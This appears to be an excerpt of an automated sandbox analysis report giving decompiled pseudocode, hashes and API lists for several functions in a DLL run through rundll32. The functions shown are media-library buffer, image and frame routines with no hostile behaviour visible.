                                                                      • Instruction ID: 324eb216ddd130d516033ba78e4077f7499b10045cf144ab3190435d7abd8d01
                                                                      • Opcode Fuzzy Hash: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
                                                                      • Instruction Fuzzy Hash: 77012CB8D09B418BD304EF28908152DBAE1FFC4288FD4CA6DE4CC87355E639DA408B53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E1003D010() {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t66;
                                                                      				signed char* _t72;
                                                                      				signed char* _t75;
                                                                      				signed char* _t79;
                                                                      				int _t83;
                                                                      				void* _t85;
                                                                      				signed int _t86;
                                                                      				signed int _t91;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t100;
                                                                      				signed char _t101;
                                                                      				unsigned int _t102;
                                                                      				signed int _t103;
                                                                      				void* _t105;
                                                                      				signed int _t106;
                                                                      				signed char* _t110;
                                                                      				signed char* _t112;
                                                                      				void* _t113;
                                                                      				signed char* _t115;
                                                                      				signed int _t116;
                                                                      				signed int _t117;
                                                                      				signed char* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t121;
                                                                      				signed char** _t123;
                                                                      
                                                                      				_t97 = _t123[0x18];
                                                                      				_t112 = _t123[0x19];
                                                                      				if(_t97 > 0xb) {
                                                                      					_t66 = 1;
                                                                      				} else {
                                                                      					_t100 =  *(0x100bf9ec + (_t97 + _t97 * 4) * 4);
                                                                      					_t66 =  !=  ? _t123[0x16] : 1;
                                                                      				}
                                                                      				 *_t123 = _t66;
                                                                      				_t123[1] = 4;
                                                                      				_t115 = E100291F0();
                                                                      				 *(_t123[0x14]) = _t115;
                                                                      				if(_t115 == 0) {
                                                                      					_t123[0xb] = 0xfffffff4;
                                                                      					goto L15;
                                                                      				} else {
                                                                      					_t123[4] = _t112;
                                                                      					_t123[3] = _t97;
                                                                      					 *_t123 = 0;
                                                                      					_t123[2] = _t123[0x17];
                                                                      					_t123[1] = _t123[0x16];
                                                                      					_t72 = L1003CB90(_t97, 4, _t112, _t115);
                                                                      					_t123[0xb] = _t72;
                                                                      					if(_t72 < 0) {
                                                                      						L22:
                                                                      						 *_t123 = _t123[0x14];
                                                                      						E100290E0();
                                                                      						return _t123[0xb];
                                                                      					} else {
                                                                      						 *_t123 = _t72;
                                                                      						_t75 = L10028D50();
                                                                      						_t118 = _t75;
                                                                      						if(_t75 == 0) {
                                                                      							_t123[0xb] = 0xfffffff4;
                                                                      							goto L22;
                                                                      						} else {
                                                                      							_t123[6] = _t112;
                                                                      							_t123[5] = _t97;
                                                                      							_t123[2] = _t118;
                                                                      							 *_t123 = _t115;
                                                                      							_t123[4] = _t123[0x17];
                                                                      							_t123[3] = _t123[0x16];
                                                                      							_t123[1] = _t123[0x15];
                                                                      							_t79 = L1003CCD0();
                                                                      							_t123[0xb] = _t79;
                                                                      							if(_t79 < 0) {
                                                                      								 *_t123 = _t118;
                                                                      								L100290D0();
                                                                      								goto L22;
                                                                      							} else {
                                                                      								if(_t97 > 0xb) {
                                                                      									_t119 = 0;
                                                                      									_t123[0x16] = 1;
                                                                      									_t98 = 0;
                                                                      									goto L9;
                                                                      								} else {
                                                                      									_t85 = 0x100bf9e0 + (_t97 + _t97 * 4) * 4;
                                                                      									_t86 =  *(_t85 + 0xc);
                                                                      									_t121 =  *(_t85 + 8) >> 3;
                                                                      									if(_t86 == 0) {
                                                                      										_t123[0x16] = 1;
                                                                      										_t106 = _t123[0x17];
                                                                      										_t119 = _t121 * _t123[0x16] * _t106;
                                                                      										_t98 = ((_t86 & 0xffffff00 | _t97 == 0x00000005 | _t106 & 0xffffff00 | _t97 == 0x00000000) & 0x000000ff) << 7;
                                                                      										goto L9;
                                                                      									} else {
                                                                      										_t91 = _t123[0x17];
                                                                      										_t119 = _t121 * _t91;
                                                                      										_t98 = ((_t91 & 0xffffff00 | _t97 == 0x00000000 | _t100 & 0xffffff00 | _t97 == 0x00000005) & 0x000000ff) << 7;
                                                                      										if(_t123[0x16] > 0) {
                                                                      											L9:
                                                                      											_t110 = _t115;
                                                                      											_t123[0xa] = _t115 + _t123[0x16] * 4;
                                                                      											_t83 = _t98 * 0x1010101;
                                                                      											do {
                                                                      												_t101 =  *_t110;
                                                                      												_t116 = _t119;
                                                                      												_t113 = _t101;
                                                                      												if(_t119 >= 8) {
                                                                      													if((_t101 & 0x00000001) != 0) {
                                                                      														 *_t101 = _t83;
                                                                      														_t56 = _t119 - 1; // -1
                                                                      														_t116 = _t56;
                                                                      														_t113 = _t113 + 1;
                                                                      													}
                                                                      													if((_t113 & 0x00000002) != 0) {
                                                                      														 *_t113 = _t83;
                                                                      														_t116 = _t116 - 2;
                                                                      														_t113 = _t113 + 2;
                                                                      													}
                                                                      													if((_t113 & 0x00000004) != 0) {
                                                                      														 *_t113 = _t83;
                                                                      														_t116 = _t116 - 4;
                                                                      														_t113 = _t113 + 4;
                                                                      													}
                                                                      													_t102 = _t116;
                                                                      													_t116 = _t116 & 0x00000003;
                                                                      													_t103 = _t102 >> 2;
                                                                      													_t83 = memset(_t113, _t83, _t103 << 2);
                                                                      													_t123 =  &(_t123[3]);
                                                                      													_t113 = _t113 + _t103;
                                                                      												}
                                                                      												_t117 = _t116 & 0x00000007;
                                                                      												if(_t117 != 0) {
                                                                      													_t105 = 0;
                                                                      													do {
                                                                      														 *(_t113 + _t105) = _t98;
                                                                      														_t105 = _t105 + 1;
                                                                      													} while (_t105 < _t117);
                                                                      												}
                                                                      												_t110 =  &(_t110[4]);
                                                                      											} while (_t123[0xa] != _t110);
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								L15:
                                                                      								return _t123[0xb];
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      0x1003d215
                                                                      0x1003d215
                                                                      0x1003d17f
                                                                      0x1003d1f8
                                                                      0x1003d1fb
                                                                      0x1003d1fe
                                                                      0x1003d1fe
                                                                      0x1003d187
                                                                      0x1003d1e8
                                                                      0x1003d1ea
                                                                      0x1003d1ed
                                                                      0x1003d1ed
                                                                      0x1003d189
                                                                      0x1003d18b
                                                                      0x1003d18e
                                                                      0x1003d191
                                                                      0x1003d191
                                                                      0x1003d191
                                                                      0x1003d191
                                                                      0x1003d14b
                                                                      0x1003d14e
                                                                      0x1003d150
                                                                      0x1003d152
                                                                      0x1003d152
                                                                      0x1003d155
                                                                      0x1003d156
                                                                      0x1003d152
                                                                      0x1003d15a
                                                                      0x1003d15d
                                                                      0x1003d140
                                                                      0x1003d11d
                                                                      0x1003d0f7
                                                                      0x1003d163
                                                                      0x1003d16e
                                                                      0x1003d16e
                                                                      0x1003d0d3
                                                                      0x1003d09b
                                                                      0x1003d089

                                                                      APIs
                                                                      • mv_calloc.F086 ref: 1003D04A
                                                                      • mv_samples_get_buffer_size.F086 ref: 1003D07E
                                                                      • mv_malloc.F086 ref: 1003D092
                                                                      • mv_samples_fill_arrays.F086 ref: 1003D0C8
                                                                        • Part of subcall function 1003CCD0: mv_samples_get_buffer_size.F086 ref: 1003CD21
                                                                      • mv_freep.F086 ref: 1003D1B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_samples_get_buffer_size$mv_callocmv_freepmv_mallocmv_samples_fill_arrays
                                                                      • String ID:
                                                                      • API String ID: 3785048109-0
                                                                      • Opcode ID: a837376923d31b8d51785eda9ee147ded60cc4d974556988644d2961f86c7bc0
                                                                      • Instruction ID: c7ae188871f9336af766a03ae5236d5e5e7d21bd421fb7eeebc3b094d4729f23
                                                                      • Opcode Fuzzy Hash: a837376923d31b8d51785eda9ee147ded60cc4d974556988644d2961f86c7bc0
                                                                      • Instruction Fuzzy Hash: 1C515B75A083459FC701EF69E48060BFBE4EF95391F11492FE9888B351D3B5E945CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E1001B039(void* __eax, void* __ebx) {
                                                                      				void* _t82;
                                                                      
                                                                      				__eflags = __eax;
                                                                      				if(__eflags == 0) {
                                                                      					L28:
                                                                      					__edx = 0xffffffea;
                                                                      				} else {
                                                                      					__eax = 0;
                                                                      					__esp[3] = 0;
                                                                      					__eax = 0;
                                                                      					__esp[2] = 0;
                                                                      					__eax =  *(__ebx + 0x48);
                                                                      					__esp[1] =  *(__ebx + 0x48);
                                                                      					__eax =  *(__ebx + 0x44);
                                                                      					 *__esp =  *(__ebx + 0x44);
                                                                      					__eax = E100221C0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
                                                                      					__eflags = __eax;
                                                                      					__edx = __eax;
                                                                      					if(__eax < 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					__eax =  *(__ebx + 0x20);
                                                                      					__eflags = __eax;
                                                                      					if(__eflags != 0) {
                                                                      						L14:
                                                                      						__esp[0xc] = __eax;
                                                                      						__eax =  *(__ebx + 0x24);
                                                                      						__esp[0xd] =  *(__ebx + 0x24);
                                                                      						__eax =  *(__ebx + 0x28);
                                                                      						__esp[0xe] =  *(__ebx + 0x28);
                                                                      						__eax =  *(__ebx + 0x2c);
                                                                      						__esp[0xf] =  *(__ebx + 0x2c);
                                                                      						__eax =  *(__ebx + 0x48);
                                                                      						__edi =  *(__ebx + 0x48) + 0x1f;
                                                                      						__eax =  &(__esp[0xc]);
                                                                      						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
                                                                      						__esp[3] =  &(__esp[0xc]);
                                                                      						__esp[2] = __edi;
                                                                      						__eax =  *(__ebx + 0x50);
                                                                      						__esp[1] =  *(__ebx + 0x50);
                                                                      						__eax =  &(__esp[0x10]);
                                                                      						 *__esp =  &(__esp[0x10]);
                                                                      						__eax = L100219B0(__ebx, __edi, __esi, __ebp, __eflags);
                                                                      						__eflags = __eax;
                                                                      						__edx = __eax;
                                                                      						if(__eax < 0) {
                                                                      							goto L1;
                                                                      						}
                                                                      						__eax = 0x20;
                                                                      						__ecx = __esp[0x10];
                                                                      						__edx = 0x7fffffff;
                                                                      						__eflags = __esp[0x1d] - 0x20;
                                                                      						__ebp = 0x7fffffff;
                                                                      						__eax =  >=  ? __esp[0x1d] : 0x20;
                                                                      						__esi = 0x20;
                                                                      						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
                                                                      						__ebp = 0x7fffffdf;
                                                                      						__eflags = 0x7fffffdf - __ecx;
                                                                      						if(0x7fffffdf < __ecx) {
                                                                      							goto L28;
                                                                      						}
                                                                      						__ecx = __ecx + __eax;
                                                                      						__eax = __esp[0x11];
                                                                      						0x7fffffff = 0x7fffffff - __ecx;
                                                                      						__eflags = 0x7fffffff - __ecx - __eax;
                                                                      						if(0x7fffffff - __ecx < __eax) {
                                                                      							goto L28;
                                                                      						}
                                                                      						__eax = __eax + __ecx;
                                                                      						__ecx = __esp[0x12];
                                                                      						__ebp = 0x7fffffff;
                                                                      						__ebp = 0x7fffffff - __eax;
                                                                      						__eflags = 0x7fffffff - __ecx;
                                                                      						if(0x7fffffff < __ecx) {
                                                                      							goto L28;
                                                                      						}
                                                                      						__eax = __eax + __ecx;
                                                                      						__ecx = __esp[0x13];
                                                                      						__edx = 0x7fffffff - __eax;
                                                                      						__eflags = 0x7fffffff - __eax - __ecx;
                                                                      						if(0x7fffffff - __eax < __ecx) {
                                                                      							goto L28;
                                                                      						}
                                                                      						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
                                                                      						 *(__ebx + 0xb8) = __eax;
                                                                      						__eflags = __eax;
                                                                      						if(__eflags == 0) {
                                                                      							__edx = 0xfffffff4;
                                                                      							L30:
                                                                      							__esp[0xb] = __edx;
                                                                      							__ebx = E1001A460(__ebx);
                                                                      							__edx = __esp[0xb];
                                                                      							goto L1;
                                                                      						}
                                                                      						__edx = __ebx + 0x20;
                                                                      						__esp[4] = __ebx + 0x20;
                                                                      						__eax =  *(__eax + 4);
                                                                      						__esp[2] = __edi;
                                                                      						__esp[3] = __eax;
                                                                      						__eax =  *(__ebx + 0x50);
                                                                      						 *__esp = __ebx;
                                                                      						__esp[1] =  *(__ebx + 0x50);
                                                                      						__eax = L10021AF0(__ebx, __edi, __esi, __ebp, __eflags);
                                                                      						__eflags = __eax;
                                                                      						__edx = __eax;
                                                                      						if(__eax < 0) {
                                                                      							goto L30;
                                                                      						}
                                                                      						__eax =  *(__ebx + 4);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							__eax = __eax + __esi;
                                                                      							__eflags = __eax;
                                                                      							 *(__ebx + 4) = __eax;
                                                                      						}
                                                                      						__eax =  *(__ebx + 8);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							 *(__ebx + 8) = __eax;
                                                                      						}
                                                                      						__eax =  *(__ebx + 0xc);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							__edx = __esi + __esi * 2;
                                                                      							__eax = __eax + __esi + __esi * 2;
                                                                      							__eflags = __eax;
                                                                      							 *(__ebx + 0xc) = __eax;
                                                                      						}
                                                                      						 *(__ebx + 0x40) = __ebx;
                                                                      						__edx = 0;
                                                                      					} else {
                                                                      						__eax = __esp[0x1d];
                                                                      						__esi = 0x20;
                                                                      						__ebp = 1;
                                                                      						__edi = __ebx + 0x20;
                                                                      						__eflags = __esp[0x1d];
                                                                      						__esi =  >  ? __esp[0x1d] : 0x20;
                                                                      						__eax = 0x1f;
                                                                      						__esp[0xb] = 0x1f;
                                                                      						while(1) {
                                                                      							__eax =  *(__ebx + 0x44);
                                                                      							__ebp =  ~__ebp;
                                                                      							 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
                                                                      							__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                                      							__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                                      							__eax =  *(__ebx + 0x50);
                                                                      							 *__esp = __edi;
                                                                      							__esp[1] =  *(__ebx + 0x50);
                                                                      							__eax = E100215D0(__eflags);
                                                                      							__eflags = __eax;
                                                                      							__edx = __eax;
                                                                      							if(__eax < 0) {
                                                                      								goto L1;
                                                                      							}
                                                                      							__eax =  *(__ebx + 0x20);
                                                                      							__eflags = __esp[0xb] & __eax;
                                                                      							if((__esp[0xb] & __eax) != 0) {
                                                                      								__ebp = __ebp + __ebp;
                                                                      								__eflags = __ebp - __esi;
                                                                      								if(__eflags > 0) {
                                                                      									L10:
                                                                      									__ecx =  *(__ebx + 0x24);
                                                                      									__eax = __esi + __eax - 1;
                                                                      									__edx = __esi;
                                                                      									__edx =  ~__esi;
                                                                      									__eax = __eax & __edx;
                                                                      									 *(__ebx + 0x20) = __eax;
                                                                      									__eflags = __ecx;
                                                                      									if(__eflags != 0) {
                                                                      										__ecx = __esi + __ecx - 1;
                                                                      										 *(__ebx + 0x24) = __ecx;
                                                                      										__ecx =  *(__ebx + 0x28);
                                                                      										__eflags = __ecx;
                                                                      										if(__eflags != 0) {
                                                                      											__ecx = __esi + __ecx - 1;
                                                                      											 *(__ebx + 0x28) = __ecx;
                                                                      											__ecx =  *(__ebx + 0x2c);
                                                                      											__eflags = __ecx;
                                                                      											if(__eflags != 0) {
                                                                      												__edx = __edx & __ecx;
                                                                      												__eflags = __edx;
                                                                      												 *(__ebx + 0x2c) = __edx;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									goto L14;
                                                                      								}
                                                                      								continue;
                                                                      							}
                                                                      							__eflags = __eax;
                                                                      							if(__eflags == 0) {
                                                                      								goto L14;
                                                                      							}
                                                                      							goto L10;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L1:
                                                                      				return _t82;
                                                                      			}




                                                                      0x1001b1ac
                                                                      0x1001b1b0
                                                                      0x1001b1b2
                                                                      0x1001b1b4
                                                                      0x1001b1b6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b1bc
                                                                      0x1001b1be
                                                                      0x1001b1c2
                                                                      0x1001b1c4
                                                                      0x1001b1c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b1cd
                                                                      0x1001b1d2
                                                                      0x1001b1d8
                                                                      0x1001b1da
                                                                      0x1001b2c7
                                                                      0x1001b2cc
                                                                      0x1001b2cc
                                                                      0x1001b2d2
                                                                      0x1001b2d7
                                                                      0x00000000
                                                                      0x1001b2d7
                                                                      0x1001b1e0
                                                                      0x1001b1e3
                                                                      0x1001b1e7
                                                                      0x1001b1ea
                                                                      0x1001b1ee
                                                                      0x1001b1f2
                                                                      0x1001b1f5
                                                                      0x1001b1f8
                                                                      0x1001b1fc
                                                                      0x1001b201
                                                                      0x1001b203
                                                                      0x1001b205
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b20b
                                                                      0x1001b20e
                                                                      0x1001b210
                                                                      0x1001b212
                                                                      0x1001b212
                                                                      0x1001b214
                                                                      0x1001b214
                                                                      0x1001b217
                                                                      0x1001b21a
                                                                      0x1001b21c
                                                                      0x1001b221
                                                                      0x1001b221
                                                                      0x1001b224
                                                                      0x1001b227
                                                                      0x1001b229
                                                                      0x1001b22b
                                                                      0x1001b22e
                                                                      0x1001b22e
                                                                      0x1001b230
                                                                      0x1001b230
                                                                      0x1001b233
                                                                      0x1001b236
                                                                      0x1001b083
                                                                      0x1001b083
                                                                      0x1001b087
                                                                      0x1001b08c
                                                                      0x1001b091
                                                                      0x1001b094
                                                                      0x1001b096
                                                                      0x1001b09b
                                                                      0x1001b09e
                                                                      0x1001b0ae
                                                                      0x1001b0ae
                                                                      0x1001b0b3
                                                                      0x1001b0b7
                                                                      0x1001b0b8
                                                                      0x1001b0ba
                                                                      0x1001b0be
                                                                      0x1001b0c1
                                                                      0x1001b0c4
                                                                      0x1001b0c8
                                                                      0x1001b0cd
                                                                      0x1001b0cf
                                                                      0x1001b0d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b0d7
                                                                      0x1001b0da
                                                                      0x1001b0de
                                                                      0x1001b0a8
                                                                      0x1001b0aa
                                                                      0x1001b0ac
                                                                      0x1001b0e4
                                                                      0x1001b0e4
                                                                      0x1001b0e7
                                                                      0x1001b0eb
                                                                      0x1001b0ed
                                                                      0x1001b0ef
                                                                      0x1001b0f1
                                                                      0x1001b0f4
                                                                      0x1001b0f6
                                                                      0x1001b0f8
                                                                      0x1001b0fe
                                                                      0x1001b101
                                                                      0x1001b104
                                                                      0x1001b106
                                                                      0x1001b108
                                                                      0x1001b10e
                                                                      0x1001b111
                                                                      0x1001b114
                                                                      0x1001b116
                                                                      0x1001b11c
                                                                      0x1001b11c
                                                                      0x1001b11e
                                                                      0x1001b11e
                                                                      0x1001b116
                                                                      0x1001b106
                                                                      0x00000000
                                                                      0x1001b0f6
                                                                      0x00000000
                                                                      0x1001b0ac
                                                                      0x1001b0e0
                                                                      0x1001b0e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b0e2
                                                                      0x1001b0ae
                                                                      0x1001b07d
                                                                      0x1001af07
                                                                      0x1001af10

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F086 ref: 1001B043
                                                                      • mv_image_check_size.F086 ref: 1001B069
                                                                        • Part of subcall function 100221C0: mv_image_get_linesize.F086 ref: 10022203
                                                                      • mv_image_fill_linesizes.F086 ref: 1001B0C8
                                                                        • Part of subcall function 100215D0: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      • mv_image_fill_plane_sizes.F086 ref: 1001B15D
                                                                      • mv_buffer_alloc.F086 ref: 1001B1CD
                                                                      • mv_image_fill_pointers.F086 ref: 1001B1FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
                                                                      • String ID:
                                                                      • API String ID: 566543421-0
                                                                      • Opcode ID: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
                                                                      • Instruction ID: 4992ce4e1065cc46e00ece35f003ee7f574db56b11f2f258b44564899a0fbe5b
                                                                      • Opcode Fuzzy Hash: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
                                                                      • Instruction Fuzzy Hash: 4561E7B5A08B018FCB44DF69D59065ABBE1FF88240F16897DE949CB315E735E844CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E1001C210(signed char _a4) {
                                                                      				char _v60;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v208;
                                                                      				intOrPtr _v212;
                                                                      				intOrPtr _v308;
                                                                      				intOrPtr _v312;
                                                                      				intOrPtr _v316;
                                                                      				intOrPtr _v320;
                                                                      				intOrPtr _v324;
                                                                      				char _v388;
                                                                      				intOrPtr _v404;
                                                                      				signed char _v408;
                                                                      				intOrPtr _t49;
                                                                      				signed int _t50;
                                                                      				void* _t59;
                                                                      				intOrPtr _t63;
                                                                      				void* _t67;
                                                                      				void* _t69;
                                                                      				void* _t72;
                                                                      				signed int _t76;
                                                                      				signed char _t82;
                                                                      				intOrPtr* _t83;
                                                                      				signed int _t84;
                                                                      				signed char _t93;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      				signed int _t96;
                                                                      				void* _t97;
                                                                      				void* _t98;
                                                                      				intOrPtr* _t99;
                                                                      
                                                                      				_t99 = _t98 - 0x18c;
                                                                      				_t93 = _a4;
                                                                      				_t49 =  *((intOrPtr*)(_t93 + 0xb8));
                                                                      				if(_t49 == 0) {
                                                                      					L10:
                                                                      					_t82 =  &_v388;
                                                                      					_t50 = 0;
                                                                      					do {
                                                                      						 *((intOrPtr*)(_t82 + _t50)) = 0;
                                                                      						 *((intOrPtr*)(_t82 + _t50 + 4)) = 0;
                                                                      						_t50 = _t50 + 8;
                                                                      					} while (_t50 < 0x168);
                                                                      					_v308 =  *((intOrPtr*)(_t93 + 0x50));
                                                                      					_v208 =  *((intOrPtr*)(_t93 + 0xb4));
                                                                      					_v320 =  *((intOrPtr*)(_t93 + 0x44));
                                                                      					_v316 =  *((intOrPtr*)(_t93 + 0x48));
                                                                      					_v100 =  *((intOrPtr*)(_t93 + 0x120));
                                                                      					_v212 =  *((intOrPtr*)(_t93 + 0xb0));
                                                                      					_v312 =  *((intOrPtr*)(_t93 + 0x4c));
                                                                      					_v408 = _t93 + 0x148;
                                                                      					 *_t99 =  &_v60;
                                                                      					_t59 = E1000D340();
                                                                      					_t94 = _t59;
                                                                      					if(_t59 < 0) {
                                                                      						L24:
                                                                      						E1001A460(_t82);
                                                                      						return _t94;
                                                                      					} else {
                                                                      						_t63 =  *((intOrPtr*)(_t93 + 0x128));
                                                                      						if(_t63 == 0) {
                                                                      							 *_t99 = _t82;
                                                                      							_v408 = 0;
                                                                      							_t95 = L1001ADF0();
                                                                      						} else {
                                                                      							_v408 = _t82;
                                                                      							_v404 = 0;
                                                                      							 *_t99 = _t63;
                                                                      							_t95 = E1001E690();
                                                                      						}
                                                                      						if(_t95 < 0) {
                                                                      							goto L23;
                                                                      						} else {
                                                                      							_v408 = _t93;
                                                                      							 *_t99 = _t82;
                                                                      							_t67 = L1001B8D0();
                                                                      							_t118 = _t67;
                                                                      							_t94 = _t67;
                                                                      							if(_t67 < 0) {
                                                                      								goto L24;
                                                                      							} else {
                                                                      								_t69 = L1001A6C0(_t82, 1, _t93, _t118);
                                                                      								_t94 = _t69;
                                                                      								if(_t69 < 0) {
                                                                      									goto L24;
                                                                      								} else {
                                                                      									E1001A460(_t93);
                                                                      									_t72 = 0;
                                                                      									do {
                                                                      										 *((intOrPtr*)(_t93 + _t72)) =  *((intOrPtr*)(_t99 + _t72 + 0x18));
                                                                      										 *((intOrPtr*)(_t93 + _t72 + 4)) =  *((intOrPtr*)(_t99 + _t72 + 0x1c));
                                                                      										_t72 = _t72 + 8;
                                                                      									} while (_t72 < 0x168);
                                                                      									if(_v324 == _t82) {
                                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t93;
                                                                      									}
                                                                      									goto L22;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t83 = _t93 + 0xbc;
                                                                      					_t96 = 1;
                                                                      					_t97 = _t93 + 0xd8;
                                                                      					L3:
                                                                      					L3:
                                                                      					if(_t49 != 0) {
                                                                      						 *_t99 = _t49;
                                                                      						_t96 = _t96 & (E1000A070() & 0xffffff00 | _t79 != 0x00000000) & 0x000000ff;
                                                                      					}
                                                                      					if(_t83 != _t97) {
                                                                      						goto L2;
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t93 + 0xdc)) > 0) {
                                                                      						_t84 = 0;
                                                                      						do {
                                                                      							 *_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0xd8)) + _t84 * 4));
                                                                      							_t76 = E1000A070();
                                                                      							_t84 = _t84 + 1;
                                                                      							_t96 = _t96 & (_t76 & 0xffffff00 | _t76 != 0x00000000) & 0x000000ff;
                                                                      						} while (_t84 <  *((intOrPtr*)(_t93 + 0xdc)));
                                                                      					}
                                                                      					if(_t96 != 0) {
                                                                      						L22:
                                                                      						_t95 = 0;
                                                                      						L23:
                                                                      						return _t95;
                                                                      					} else {
                                                                      						goto L10;
                                                                      					}
                                                                      					goto L26;
                                                                      					L2:
                                                                      					_t49 =  *_t83;
                                                                      					_t83 = _t83 + 4;
                                                                      					__eflags = _t83;
                                                                      					goto L3;
                                                                      				}
                                                                      				L26:
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
                                                                      • String ID:
                                                                      • API String ID: 1431812533-0
                                                                      • Opcode ID: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
                                                                      • Instruction ID: 9aa00ebb7c7a901d7ff1af15f7d5cd17a7e62451d1a9c752bdbd2b923dfe8871
                                                                      • Opcode Fuzzy Hash: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
